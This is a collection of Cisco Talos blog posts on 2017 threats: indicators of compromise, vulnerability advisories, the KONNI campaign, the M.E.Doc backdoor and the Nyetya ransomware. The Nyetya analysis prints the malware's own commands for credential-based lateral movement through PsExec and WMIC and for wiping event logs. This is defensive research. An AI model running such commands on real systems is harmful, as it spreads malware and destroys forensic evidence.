414d5a6eb59a5597774e3e69ead25ac64e5c5805d899886fc4c53ed0e4b1960d
f9f0449bd2187f8a69a2e8a2eebae77c45d422900a762664847f4b097796bec5
aab0014dbda65fb1ae5340a8b6da731aaa3215bb340c7df80b5b033ad2533001
29ba1dae0c75b5d67de2fb832a65a0a8d226f9585f1a3e334926259065355618

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Trojan.Fynloski-6332091-0

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: c4f40c367320fcdc570a23c70d18a343

<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: c4f40c367320fcdc570a23c70d18a343

<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

Mutexes

IP Addresses

Domain Names

Files and or directories created

%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\c4f40c367320fcdc570a23c70d18a343.exe
%SystemDrive%\Documents and Settings\Administrator\Start Menu\Programs\Startup\x.vbs
%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs
%TEMP%\IXP000.TMP\1.xyz

File Hashes

7f7811f54a31936ac15ee95d8839d763ada89ff3a80aa7479c7ea670b1a382c5
1b2149951adf10d725ad54bd262b4bcc7ca44be5986ce1414fa95082606811c8
7e9a837489b93a6f16385bd4e604923a1e4fa9c72a7d0ee1017037f26b02ed90
7077931eaa70834cb3a9862b6e405ea945459fda20d60ceb83b54a0e4a9f209f
77654b410cf65ec4e4e7b46cdef9c0df8397349cb351fa070bc9b64bdd6e83e1
83768ae6bc29747d33f106d36d12f59771a0333a997bd4b6eeaadd6b0a586f63
e9642b9759686add2d022f0f3ac0ae5c2f5efe6a2cc5bef57f9480acb4792e6b
ca006c5f27586648e44c1204f49ac555f9f4ddfd5a74af19104b031fd241adf8
ad8472fbcf4ba8f6e9c7c275a64cdf364dabebdb7b9fc950cecce980a551ba48
b3ea382eb9047ad9ba10956dbd580e70d08d027ca49504a78a24d98aed623de5
e8415def78f91ca7b6e6dab7e6efc24eedeaf8f363af66b59b4fe1bc5ed24384

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Trojan.Siggen-6261194-0

Indicators of Compromise

Registry Keys

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP

Value: Collection

Mutexes

Local\MSCTF.Asm.MutexDefault1

IP Addresses

13[.]65[.]245[.]138

Domain Names

time[.]windows[.]com

Files and or directories created

\TEMP\filename.exe
%System32%\wdi\{ffc42108-4920-4acf-a4fc-8abdcc68ada4}\{debd4f12-5573-4e21-a11a-2adccd61a055}\snapshot.etl
%System32%\wdi\LogFiles\WdiContextLog.etl.001
%System32%\wdi\{533a67eb-9fb5-473d-b884-958cf4b9c4a3}\{bc3d8877-b46d-4746-b041-b538af5e2cf0}\snapshot.etl

File Hashes

b4a615cd2cc1299da98059f2164e69d4b20fcd4179acd672153e6533b9c95709
f59c0ffee54d23875a039b546a1827c3bc40c45aee5a4887e6c8515e96d4169f
e38d7a959a6957ae51733a4f8b28e7514c4f1cbb5faf2f6314d7b17c69eef155
b3cd047683dc8944c9d9765d2e73c25c5ac1b7bba39f6b4ff748849b9a3d091b
4bcadb728a4948f945738f4d704c3f63525952ce8e6894aa6634de6e33a0d961

Coverage

Screenshots of Detection

AMP

ThreatGrid

Vulnerability Spotlight: TALOS-2017-0311,0319,0321 - Multiple Remote Code Execution Vulnerability in Poppler PDF library

noreply@blogger.com (Holger Unterbrink) — Fri, 07 Jul 2017 08:27:00 PDT

Vulnerability discovered by Marcin Noga, Lilith Wyatt and Aleksandar Nikolic of Cisco Talos.

Overview

Talos has discovered multiple vulnerabilities in the freedesktop.org Poppler PDF library. Exploiting these vulnerabilities can allow an attacker to gain full control over the victim's machine. If an attacker builds a specially crafted PDF document and the victim opens it, the attackers code will be executed with the privileges of the local user.

Details

Poppler is a shared library for displaying PDF files, used as middleware within different enterprise and open source solutions (e.g. Gimp). It is forked off from XPDF and is a complete implementation of the PDF ISO standard. Talos identified three remote code execution vulnerabilities in the Poppler library.

TALOS-2017-0311 / CVE-2017-2814 - Poppler PDF Image Display DCTStream::readScan() Code Execution Vulnerability

An exploitable heap overflow vulnerability exists in the image rendering functionality of Poppler-0.53.0. A specifically crafted PDF can cause an image resizing after allocation has already occurred, resulting in a heap corruption triggered in the DCTStream::readScan() function. This can lead to code execution with the local user rights.

TALOS-2017-0319 / CVE-2017-2818 - Poppler PDF Image Display DCTStream::readProgressiveSOF() Code Execution Vulnerability

Talos found an exploitable heap overflow vulnerability in the image rendering functionality of Poppler-0.53.0. A specifically crafted PDF can cause an overly large number of color components during image rendering, resulting in a heap corruption. This can be used by an attacker to craft a PDF file that executes malicious code on the victim's computer with the rights of the local user.

This vulnerability was formerly found (CVE-2005-3627), with a fix applied to DCTStream::readBaselineSOF, however the bug was missed in the readProgressiveSOF function.

TALOS-2017-0321 / CVE-2017-2820 - Poppler PDF library JPEG2000 levels Code Execution Vulnerability

Talos discovered an exploitable integer overflow vulnerability in the JPEG 2000 image parsing functionality of the Poppler 0.53.0 library. An attacker can build a specially crafted PDF file that uses this bug to trigger an integer overflow. Later in the code execution flow, this can lead to memory getting overwritten on the heap resulting in a potential arbitrary code execution with the rights of the local user. Like with the other two vulnerabilities before, a victim must open the malicious PDF in an application using this library to exploit this vulnerability. One example of a vulnerable application is the default PDF reader Evince, shipped with the latest version of Ubuntu Linux.

Additional Notes

We would like to highlight that TALOS-2017-0311 and TALOS-2017-0321 are in Poppler's internal, unmaintained JPEG and JPEG2000 decoders which shouldn't ever be used. Even Poppler’s documentation strongly suggests not using them. It is highly recommended to build the Poppler library with more robust and up to date external implementations such as libjpeg and openjpeg. However, Ubuntu does not do this by default for JPEG2000 and will use the unmaintained code, thus making Ubuntu-compiled versions vulnerable to these issues.

Talos is seeing client side attacks based on malicious PDF files on a daily base. If your company is using a Popper based application, it is possible that an attacker could use one of these vulnerabilities against it in a targeted attack. This shows how important it is to keep all applications up to date and not only the operation system.

More technical details can be found in the Talos Vulnerability Reports:

TALOS-2017-0311

TALOS-2017-0319

TALOS-2017-0321

Coverage

The following Snort Rules will detect exploitation attempts of this vulnerability. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org

Snort rules: 42273-42274, 42319 - 42320 , 42352-42353

New KONNI Campaign References North Korean Missile Capabilities

noreply@blogger.com (Paul Rascagneres) — Thu, 06 Jul 2017 00:58:00 PDT

This blog was authored by Paul Rascagneres

Executive Summary

We recently wrote about the KONNI Remote Access Trojan (RAT) which has been distributed by a small number of campaigns over the past 3 years. We have identified a new distribution campaign which took place on 4th July. The malware used in this campaign has similar features to that distributed earlier in 2017 with the following changes:

A new decoy document copy/pasted from an article published on the 3rd of July by Yonhap News Agency in Korea;
The dropper includes a 64 bit version of KONNI;
A new CC infrastructure consisting of a climbing club website.

North Korea conducted a test missile launch on 3rd July. This campaign appears to be directly related to the launch and the ensuing discussion of North Korean missile technology. This is consistent with previous KONNI distribution campaigns which have also frequently mentioned North Korea.

"N.K. marks anniversary of strategic force, touting missile capabilities" campaign

We identified an executable file, SHA-256 hash sum: 33f828ad462c414b149f14f16615ce25bd078630eee36ad953950e0da2e2cc90, which when opened displays the following Office document:

The content of the document is a copy/pasted from an article published on July 3rd by Yonhap News Agency in Korea. In addition to displaying this document, the malicious executable also drops 2 different versions of KONNI:

C:\Users\Users\AppData\Local\MFAData\event\eventlog.dll (64 bit)
C:\Users\Users\AppData\Local\MFAData\event\errorevent.dll (32 bit)

On 64 bit versions of Windows, both files are dropped; on 32 bit versions of Windows, only errorevent.dll, the 32 bit version is dropped. Unlike previous campaigns, both binaries are packed with ASPack. In both cases, the dropped malware is immediately executed via rundll32.exe with one of the following registry keys created to ensure that the malware persists and is executed on rebooting the compromised system:

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RTHDVCPE
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RTHDVCP

This attack uses a new Command & Control infrastructure hosted on the following domain:

member-daumchk[.]netai[.]net

The CnC traffic of KONNI takes place as HTTP post requests to web pages hosted as /weget/download.php, /weget/uploadtm.php or /weget/upload.php on the domain itself.

The attackers have gone to some effort to disguise the website as a legitimate climbing club.

Here is a screenshot of the website:

However, the website does not contain real text, only the default text of the Content Management System (CMS).

Additionally, the website contains a contacts section with an address in USA, but the map below the address is in Korean and points to a location in Seoul, South Korea:

Conclusion

The KONNI malware distributed as part of this campaign is similar to previous versions that we have identified this year. The attackers have added a 64 bit version and used a packer to complicate analysis. This campaign is directly related to current events and is clearly 'fresh'. The binary was compiled on July 4th, the decoy document was published on July 3rd.

The threat actors associated with KONNI typically use decoy documents relating to North Korea, and this campaign is no exception. However, in contrast to the convincing decoy document lifted from a third party, the content of the decoy website hosted on the CnC server does not look legitimate. The text content is not consistent with the website navigation, and the contacts page contains a mis-match of a US address with a Korean map.

Nevertheless, this threat actor continues to remain active, and continues to develop updated versions of their malware. Organisations which may have an interest in the contents of this decoy document, and that used in previous campaigns should ensure that they are adequately protected against this and subsequent campaigns.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network

IOC

File hashes

Dropper: 33f828ad462c414b149f14f16615ce25bd078630eee36ad953950e0da2e2cc90
32 Bits binary: 290b1e2415f88fc3dd1d53db3ba90c4a760cf645526c8240af650751b1652b8a
64 bits binary: 8aef427aba54581f9c3dc923d8464a92b2d4e83cdf0fd6ace00e8035ee2936ad

Network

Member-daumchk[.]netai[.]net

The MeDoc Connection

noreply@blogger.com (Nick Biasini) — Wed, 05 Jul 2017 11:22:00 PDT

This Post Authored by David Maynor, Aleksandar Nikolic, Matt Olney, and Yves Younan

Summary

The Nyetya attack was a destructive ransomware variant that affected many organizations inside of Ukraine and multinational corporations with operations in Ukraine. In cooperation with Cisco Advanced Services Incident Response, Talos identified several key aspects of the attack. The investigation found a supply chain-focused attack at M.E.Doc software that delivered a destructive payload disguised as ransomware. By utilizing stolen credentials, the actor was able to manipulate the update server for M.E.Doc to proxy connections to an actor-controlled server. Based on the findings, Talos remains confident that the attack was destructive in nature. The effects were broad reaching, with Ukraine Cyber police confirming over 2000 affected companies in Ukraine alone.

Details

For Talos, June 27th, 2017, started with a message from our intelligence partners in Ukraine. A massive ransomware attack was underway, and they were asking for help. An organized attacker had the means to deliver arbitrary code to users of the most popular accounting software in Ukraine, and that includes multinational corporations that do business there. The actor in question chose to use this capability to encrypt critical files and hard drives, with no way to decrypt the software.

Since the BlackEnergy attacks of late 2015, Talos has worked with public and private organizations in Ukraine to respond to attacks in the region. Once already this year, Talos has assisted organizations targeted by actors with destructive intent. Interestingly, in those cases a wiper very similar to prior BlackEnergy malware was deployed and, when that was blocked by our Advanced Malware Protection (AMP) product, the actor fell back to using a ransomware variant in an attempt to disrupt the organization’s activities. With this recent history in mind, we were immediately concerned that there was more to this story than just another ransomware attack.

Early on it became clear that, while a majority of the early events were in Ukraine, the malware was infecting organizations that didn’t immediately have any known connection to the country. Because of the scale of the event, Talos initiated an internal response management system call TaCERS (Talos Critical Event Response System) and began the research and response process. TaCERS divides up activities into intelligence, telemetry analysis, reverse engineering, communications and detection research. Talos researchers and engineers from around the world came together to address this threat.

Based on endpoint telemetry, it was clear that a Ukranian accounting software package called “M.E.Doc” was at the center of activity. Like WannaCry, there were reports of an email vector. This is most likely because some of the earliest infected machines had concurrent Lokibot infections with indications of an email vector for that malware. After careful research Talos concluded that for the delivery of the Nyetya malware, all installations came through the M.E.Doc update system.

M.E.Doc is a widely deployed accounting package created by a Ukrainian company named Intellect Service and that it was used to interact with Ukrainian tax systems. At this point we were in a position to reach out to M.E.Doc directly and offer assistance.

M.E.Doc was quick to accept an offer of assistance. As part of Cisco’s global response to this event, two incident response specialists from the Advanced Services group arrived in Ukraine on the evening of June 29th and an additional incident response specialist supported the investigation from the UK. M.E.Doc was exceptionally open in arranging access to engineers and administrators who walked the team through the system and provided access to log files and code. They also agreed to share the results of our investigation for the purposes of this report.

In every Cisco incident response investigation, anywhere in the world, a dedicated Talos resource is made available to the incident response team to coordinate intelligence analysis, reverse engineering escalations and telemetry analysis activities. The two teams work together constantly, and that experience was put to full use in this investigation.

Early in the investigation, a web shell was discovered at http://www.me-doc[.]com[.]ua/TESTUpdate/medoc_online.php. The timestamp in the file was May 31 14:45 2017. Our analysis shows the webshell to be a slightly modified version of the open source PHP webshell PAS. The webshell is stored in an encrypted form and requires a passphrase set in a HTTP POST variable to decrypt. The decryption of the shell shows a fully featured PAS webshell.

As the incident response team extracted logs and additional forensic data, it was uploaded to Talos. This started a 24-hour cycle where at around 10am EDT, when it was evening in Ukraine, the Cisco incident response team would brief Talos on their findings and new data. Then at 3am EDT, as Ukraine was getting to work, Talos would brief the Cisco incident response team on their overnight findings.

Almost immediately, indications of problems were found. In the July 1st briefing, Talos identified key evidence in the logs:

8:57:46 AM	usc-cert sshd[23183]: subsystem request for sftp
8:59:09 AM	usc-cert su: BAD SU to root on /dev/pts/0
8:59:14 AM	usc-cert su: to root on /dev/pts/0
9:09:20 AM	[emerg] 23319#0: unknown directive "" in /usr/local/etc/nginx/nginx.conf:3
9:11:59 AM	[emerg] 23376#0: location "/" is outside location "\.(ver\|txt\|exe\|upd\|rtf\|cmnt)$" in /usr/local/etc/nginx/nginx.conf:136

An unknown actor had stolen the credentials of an administrator at M.E.Doc. They logged into the server, acquired root privileges and then began modifying the configuration file for the NGINX web server. We were unable to recover the nginx.conf file, as it was subsequently overwritten, but additional log files were important in understanding what was changed. What we found were thousands of errors that looked like this:

[error] 23401#0: *374685644 upstream timed out (60: Operation timed out) while connecting to upstream, client: <REDACTED>, server: upd.me-doc.com.ua, request: "GET /last.ver?rnd=1b2eb092215b49f5b1d691b5c38e3a74 HTTP/1.1", upstream: "http://176.31.182[.]167:80/last.ver?rnd=1b2eb092215b49f5b1d691b5c38e3a74", host: "upd.me-doc.com.ua"

The NGINX server had been reconfigured so that any traffic to upd.me-doc.com.ua would be proxied through the update server and to a host in the OVH IP space with an IP of 176.31.182.167. Subsequent investigation found that this server was operated by a reseller, thcservers.com, and that the server had been wiped the same day at 7:46 PM UTC.

When we compare the time of the first and last upstream error messages on the server to our in-field endpoint telemetry, we find that they bracket the beginning and the end of the active infection phase of the event. The initial log message was at 9:11:59 UTC and the last message was seen at 12:31:12 UTC. In our telemetry we see no new organizations infected outside of this timeframe.

We found one other piece of forensic evidence showing that the event concluded on or around 12:30 PM UTC. The file timestamp for nginx.conf at the time we analyzed the servers was Jun 27th, 12:33 PM UTC. The actor had returned the NGINX configuration to its original state at this time. There is only one other indicator to share, which was a Latvian IP address that disconnected from the system at 2:11:07 PM UTC:

Received disconnect from 159.148.186.214: 11: FlowSshClientSession: disconnected on user's request

M.E.Doc confirms that neither the OVH server nor the Latvian IP address have any association with M.E.Doc.

At this point we understood that the actor in question had access to much of the network and many of the systems of M.E.Doc through compromised credentials. The questions remaining were: What were they doing with control of the upgrade server? How were they delivering the malicious software?

While we didn’t know it at the time, we can now confirm ESET’s research into the backdoor that had been inserted into the M.E.Doc software. The .net code in ZvitPublishedObjects.dll had been modified on multiple occasions to allow for a malicious actor to gather data and download and execute arbitrary code:

Date	M.E.Doc Update Version
4/14/2017	10.01.175-10.01.176
5/15/2017	10.01.180-10.01.181
6/22/2017	10.01.188-10.01.189

Looking further back in the logs provided by M.E.Doc, we could see the same “upstream” activity on June 22nd. Unfortunately, we do not have logs available for May or April, but it is reasonable to assume similar behavior occurs back through those dates as well.

Timeline

ZvitPublishedObjects.dll Backdoor Analysis

The backdoor was added to the ZvitPublishedObjects.Server.UpdaterUtils.IsNewUpdate function in ZvitPublishedObjects.dll:

Between lines 278 and 279 on the left, we can see on the right that code was added to retrieve every organization’s EDRPOU and name. Then it creates a new MeCom object and a thread for it which will contact http://upd.me-doc[.]com.ua/last.ver?rnd=<GUID> every 2 minutes. It will also send any replies to this URL.

If a proxy has been configured, when the MeCom object is created at line 288 on the right, it proceeds to retrieve the proxy’s host, port, username and password:

It then retrieves the SMTP host, username, password and email address for every organization in the application’s database:

It also writes the previously collected proxy info to a registry key: HKCU\SOFTWARE\WC. It stores the proxy username and password in the “Cred” subkey and the full proxy information in “Prx”.

At line 294 in IsNewUpdate is a call to meCom.CreateMeainThread. The code creates a thread that performs the “MainAction”. This thread will continuously query the request URL (http://upd.me-doc[.]com.ua/last.ver?rnd=<GUID>) looking for commands and will then start a new thread per command to execute, waiting a maximum of 10 minutes for the thread to complete. It will then send back the result of the thread to the response url, which in this case is the same as the request URL: http://upd.me-doc[.]com.ua/last.ver?rnd=<GUID>.

The GetCommandsAndPeriod function will retrieve the commands from the web request:

When sending the request, it will pass along in cookies the EDRPOU and the username that the program is running as. From the response, it will read the first 8 bytes as the initialization vector for the encryption. The rest of the data is encrypted with the TripleDes using a 24-character key: \x00 to \x17 (i.e. characters 0 to 23). It will decrypt, decompress and deserialize the commands it has to execute. It will also retrieve information on how long it should wait until the next time it goes to ask for commands (this was originally set to 2 minutes when the object was created).

SendAnswer will send multiple web requests with a maximum of 2048 bytes each, with the result of the executed command stored in cookies. It will encrypt this data the same way as the received commands, using a random 8-byte IV and the 24-character key 0-23.

These are the encryption and decryption functions:

Finally, the Worker object (see Line 372 of MainFunction) handles executing the commands. There are a total of 6 commands that Worker can execute.

This appears to be the mechanism used for delivering the Nyetya malware. The command line arguments perfectly match what was observed in endpoint telemetry when M.E.Doc machines executed the initial sample.

Detail of Commands

What Now?

First we need to put together everything we know. In the past Talos has observed an actor specifically targeting Ukrainian institutions attempt to use the BlackEnergy wiper malware and, when that attempt was blocked, fall back to using a ransomware variant as an acceptable replacement for a wiper. We’ve also already documented in our previous blog that “Given the circumstances of this attack, Talos assesses with high confidence that the intent of the actor behind Nyetya was destructive in nature and not economically motivated.” Finally, now that we can confirm that M.E.Doc was the installation vector, we can assess that the targets for this attack were Ukraine and those organizations that chose to conduct business with Ukraine.

Our Threat Intelligence and Interdiction team is concerned that the actor in question burned a significant capability in this attack. They have now compromised both their backdoor in the M.E.Doc software and their ability to manipulate the server configuration in the update server.

In short, the actor has given up the ability to deliver arbitrary code to the 80% of UA businesses that use M.E.Doc as their accounting software, along with any multinational corporations that leveraged the software. This is a significant loss in operational capability, and the Threat Intelligence and Interdiction team assesses with moderate confidence that it is unlikely that they would have expended this capability without confidence that they now have or can easily obtain similar capability in target networks of highest priority to the threat actor.

Based on this, Talos is advising that any organization with ties to Ukraine treat software like M.E.Doc and systems in Ukraine with extra caution since they have been shown to be targeted by advanced threat actors. This includes providing them a separate network architecture, increased monitoring and hunting activities in those at-risk systems and networks and allowing only the level of access absolutely necessary to conduct business. Patching and upgrades should be prioritized on these systems and customers should move to transition these systems to Windows 10, following the guidance from Microsoft on securing those systems. Additional guidance for network security baselining is available from Cisco as well. Network IPS should be deployed on connections between international organizations and their Ukrainian branches and endpoint protection should be installed immediately on all Ukrainian systems.

Talos places this attack in the supply-chain category. Rather than targeting organizations directly, an actor compromises trusted hardware and software vendors to deliver compromised assets to a high-priority environment. We believe that these types of malicious capabilities are highly desired by sophisticated actors. All vendors, regardless of size or geographic region, must be increasingly vigilant. Find out more about how Cisco assures the integrity of their products here.

For further coverage of the Nyetya incident, please refer to our previous blog post.

Indicators of Compromise

SHA256

M.E.Doc ZvitPublishedObjects.dll files with backdoor:

f9d6fe8bd8aca6528dec7eaa9f1aafbecde15fd61668182f2ba8a7fc2b9a6740
d462966166450416d6addd3bfdf48590f8440dd80fc571a389023b7c860ca3ac
2fd2863d711a1f18eeee5c7c82f2349c5d4e00465de9789da837fcdca4d00277

Nyetya Malware:

027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998

Malicious IP Addresses:

176.31.182[.]167
159.148.186[.]214

AMP Coverage

W32.Ransomware.Nyetya.Talos
W32.F9D6FE8BD8.Backdoor.Ransomware.Nyetya.Talos
W32.D462966166.Backdoor.Ransomware.Nyetya.Talos
W32.2FD2863D71.Backdoor.Ransomware.Nyetya.Talos
W32.02EF73BD24-95.SBX.TG
W32.GenericKD:Petya.20h1.1201

Vulnerability Spotlight: Dell Precision Optimizer and Invincea Vulnerabilities

noreply@blogger.com (Martin Lee) — Fri, 30 Jun 2017 11:05:00 PDT

Vulnerabilities discovered by Marcin ‘Icewall’ Noga of Cisco Talos.

Overview

Talos are releasing advisories for vulnerabilities in the Dell Precision Optimizer application service software, Invincea-X and Invincea Dell Protected Workspace. These packages are pre-installed on certain Dell systems. Vulnerabilities present in these applications could allow attackers to disable security mechanisms, escalate privileges and execute arbitrary code within the context of the application user.

Vulnerability Details

Privilege Escalation Vulnerability TALOS-2016-0256 (CVE-2016-9038)

This vulnerability is a double fetch in the SboxDrv.sys driver. The vulnerability is triggered by sending crafted data to the \Device\SandboxDriverApi device driver which is read/write accessible to everyone. A successful exploitation results in an arbitrary value written to kernel memory space, which can lead to local privilege escalation.

Known vulnerable: Invincea-X, Dell Protected Workspace 6.1.3-24058

More details can be found in the vulnerability report: TALOS-2016-0256.

Protection Bypass Vulnerability TALOS-2016-0246 (CVE-2016-8732)

Invincea Dell Protected Workspace is a security solution offered by Dell that seeks to provide enhanced protection for endpoints. Multiple security flaws exist within one of the driver components, ‘InvProtectDrv.sys’ that is included in version 5.1.1-22303 of this software. Due to weak restrictions on the driver communications channel, as well as insufficient validation, an attacker controlled application that is executed on an affected system could leverage this driver to effectively disable some of the protection mechanisms provided by the software.

Known vulnerable: Invincea, Dell Protected Workspace 5.1.1-22303
This vulnerability is fixed in the 6.3.0 release of the software.
More details can be found in the vulnerability report: TALOS-2016-2046.

Protection Bypass Vulnerability TALOS-2016-0247 (CVE-2017-2802)

During the start of ‘Dell PPO Service’, supplied by Dell Precision Optimizer application, the program “c:\Program Files\Dell\PPO\poaService.exe” loads the dll, “c:\Program Files\Dell\PPO\ati.dll”. This in turn attempts to load “atiadlxx.dll”, which is not present by default in the application directory. The program searches for an appropriately named dll in the directories specified by the PATH environment variable. If it finds a dll with the same name, it will load the dll into poaService.exe without checking the signature of the dll. This can lead to execution of arbitrary code if an attacker supplies a malicious dll of the correct name.

Dell has released an update to resolve this issue. All versions from v4.0 onwards are not vulnerable, for more information see: www.dell.com/optimizer.

Known vulnerable: Dell Precision Tower 5810 with nvidia graphic cards, PPO Policy Processing Engine (3.5.5.0), ati.dll (PPR Monitoring Plugin) (3.5.5.0).

More details can be found in the vulnerability report: TALOS-2016-2047.

Security Implications

Given that the Invincea Dell Protected Workspace is an application that is commonly deployed to secure workstations within high security environments, it is recommended that organizations using affected versions of this solution update to the latest version as quickly as possible to ensure that the protections provided by this software cannot be bypassed by an attacker. Dell Protected Workspace is based on Invincea's software. Dell is currently working on providing an update to incorporate Invincea's fix. Organisations need to carefully consider the risks and benefits of software bundled with devices. Potentially, any software may contain exploitable vulnerabilities. Bundled software can provide usefully functionality, but if it is unused, allowing it to persist on devices exposes organisations to vulnerabilities without providing any benefits in return. As with any unused software, removing the software removes associated vulnerabilities and removes an additional package from patching schedules.

Coverage

The following Snort Rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules: 41306 - 41309, 41312 - 41313

New Ransomware Variant "Nyetya" Compromises Systems Worldwide

noreply@blogger.com (Alexander Chiu) — Tue, 27 Jun 2017 11:02:00 PDT

Note: This blog post discusses active research by Talos into a new threat. This information should be considered preliminary and will be updated as research continues.

Update 2017-07-06 12:30 EDT: Updated to explain the modified DoublePulsar backdoor.

Since the SamSam attacks that targeted US healthcare entities in March 2016, Talos has been concerned about the proliferation of malware via unpatched network vulnerabilities. In May 2017, WannaCry ransomware took advantage of a vulnerability in SMBv1 and spread like wildfire across the Internet.

Today a new malware variant has surfaced that is distinct enough from Petya that people have referred to it by various names such as Petrwrap and GoldenEye. Talos is identifying this new malware variant as Nyetya. The sample leverages EternalBlue, EternalRomance, WMI, and PsExec for lateral movement inside an affected network. This behavior is detailed later in the blog under "Malware Functionality". Unlike WannaCry, Nyetya does not appear to contain an external scanning component.

The identification of the initial vector is still under investigation. We have observed no use of email or Office documents as a delivery mechanism for this malware. We believe that infections are associated with software update systems for a Ukrainian tax accounting package called MeDoc. Talos is investigating this currently.

Given the circumstances of this attack, Talos assesses with high confidence that the intent of the actor behind Nyetya was destructive in nature and not economically motivated. Talos strongly recommends users and organizations decline to pay the ransom. Any attempts to obtain a decryption key will be fruitless as the associated mailbox used for payment verification and decryption key sharing has been shut down by the posteo.de. This renders any successful payment as useless as there is no method of communication available for this actor to use to verify payments from victims or distribute decryption keys once ransom payments have been received. There is also no method used by the malware to directly connect to command and control for remote unlocking.

Recovery of User Credentials

Nyetya requires user credentials to spread itself laterally via the PsExec and WMI vectors (which are detailed in the "Malware Functionality" section). Talos has identified three ways Nyetya can obtain these credentials.

First, credentials can be manually passed in via a command line argument. Here is the syntax:

rundll32.exe C:\Windows\perfc.dat,#1 60 "username:password"

A second method consists to use the CredEnumerateW Windows API.

Finally, Perfc.dat contains three embedded executables in its resource section which are compressed with zlib. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary. The executables related to credential recovery are dropped as a temporary files in the user’s %TEMP% folder and run with a named pipe parameter (containing a GUID). The main executable communicates with the dropped executable using this named pipe. For example:

C:\WINDOWS\TEMP\561D.tmp, \\.\pipe\{C1F0BF2D-8C17-4550-AF5A-65A22C61739C}

The dropped .tmp executable seems to be based on Mimikatz, a popular open source tool used for recovery of user credentials from computer memory using several different techniques. However, Talos has confirmed that the executable is not specifically the Mimikatz tool.

The recovered credentials are then used for launching malware on the remote system using WMIC and PsExec. This is detailed below.

Malware Functionality

Perfc.dat contains the functionality needed to further compromise the system and contains a single unnamed export function referred to as #1. As part of the propagation process, the malware enumerates all visible machines on the network via the NetServerEnum API call and then scans for an open TCP 139 port. This is done to compile a list of devices that expose this port and may possibly be susceptible to compromise.

Nyetya has several mechanisms that are used to propagate once a device is infected:

EternalBlue - the same exploit used by WannaCry.
EternalRomance - an SMBv1 exploit leaked by "ShadowBrokers"
PsExec - a legitimate Windows administration tool.
WMI - Windows Management Instrumentation, a legitimate Windows component.

These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally.

For systems that have not had MS17-010 applied, the EternalBlue and EternalRomance exploits are leveraged to compromise systems. The exploit launched against the victim system depends on the operating system of the intended target.

EternalBlue

Windows Server 2008 R2
Windows Server 2008
Windows 7

EternalRomance

Windows XP
Windows Server 2003
Windows Vista

The two exploits drop a modified version of DoublePulsar which is a persistent backdoor running in kernel space of the compromised system. The developer modified only few bytes from the original version but this modification allowed it to evade network detection and the open source DoublePulsar scanning tools available on the Internet. The modification can be divided in 3 parts:

The attacker modified the command codes:

Original Command Code	Nyetya Command Code	Purpose
0x23	0xF0	PING
0x77	0xF1	KILL
0xC8	0xF2	EXEC

The attacker modified the response codes:

Original Response Code	Nyetya Response Code	Purpose
0x10	0x11	OK
0x20	0x21	CMD_INVALID
0x30	0x31	ALLOCATION_FAILURE

The attacker modified where the response code is stored in the SMB response packet. In the original version of DouplePulsar, the code was stored in the MultiplexID field (offset 0x1E). In the Nyetya version, the response code is stored in a reserved field (offset 0x16) which is normally set to 0x0000

We implemented a specific NGIPS / Snort rule to detect this DoublePulsar variant: 43459.

PsExec is used to execute the following instruction (where w.x.y.z is an IP address) using the current user's windows token (from the "Recovery of User Credentials" section above) to install the malware on the networked device.

C:\WINDOWS\dllhost.dat \\w.x.y.z -accepteula -s -d C:\Windows\System32\rundll32.exe C:\Windows\perfc.dat,#1 60

WMI is used to execute the following command which performs the same function as above, but using the current user's username and password (as username and password), retrieved from the "Recovery of User Credentials" section above.

Wbem\wmic.exe /node:"w.x.y.z" /user:"username" /password:"password" "process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1 60"

Once a system is successfully compromised, the malware encrypts files on the host using 2048-bit RSA encryption. Additionally, the malware cleans event logs on the compromised device using the following command:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:

Nytetya attempts to obtain administrative privileges (SeShutdowPrivilege and SeDebugPrivilege) for the current user through the Windows API AdjustTokenPrivileges. If successful, Nyetya overwrites the boot sector on PhysicalDrive0 without first saving a copy. If overwriting the boot sector fails, Nyetya instead wipes the first ten sectors of the disk drive. Additionally, if Nyetya finds a process file name hash of 2E214B44 on the system, it will also wipe the first ten sectors of the disk drive. Talos has identified that this hash is referring to avp.exe, which corresponds to Kaspersky Anti-virus. Systems that have the boot sector overwritten will see this message when restarting their systems.

Screenshot of a system compromised by Nyetya.

Note that regardless of whether Nyetya is successful in overwriting the boot sector or not, it will proceed to create a scheduled task via schtasks to reboot the system one hour after infection.

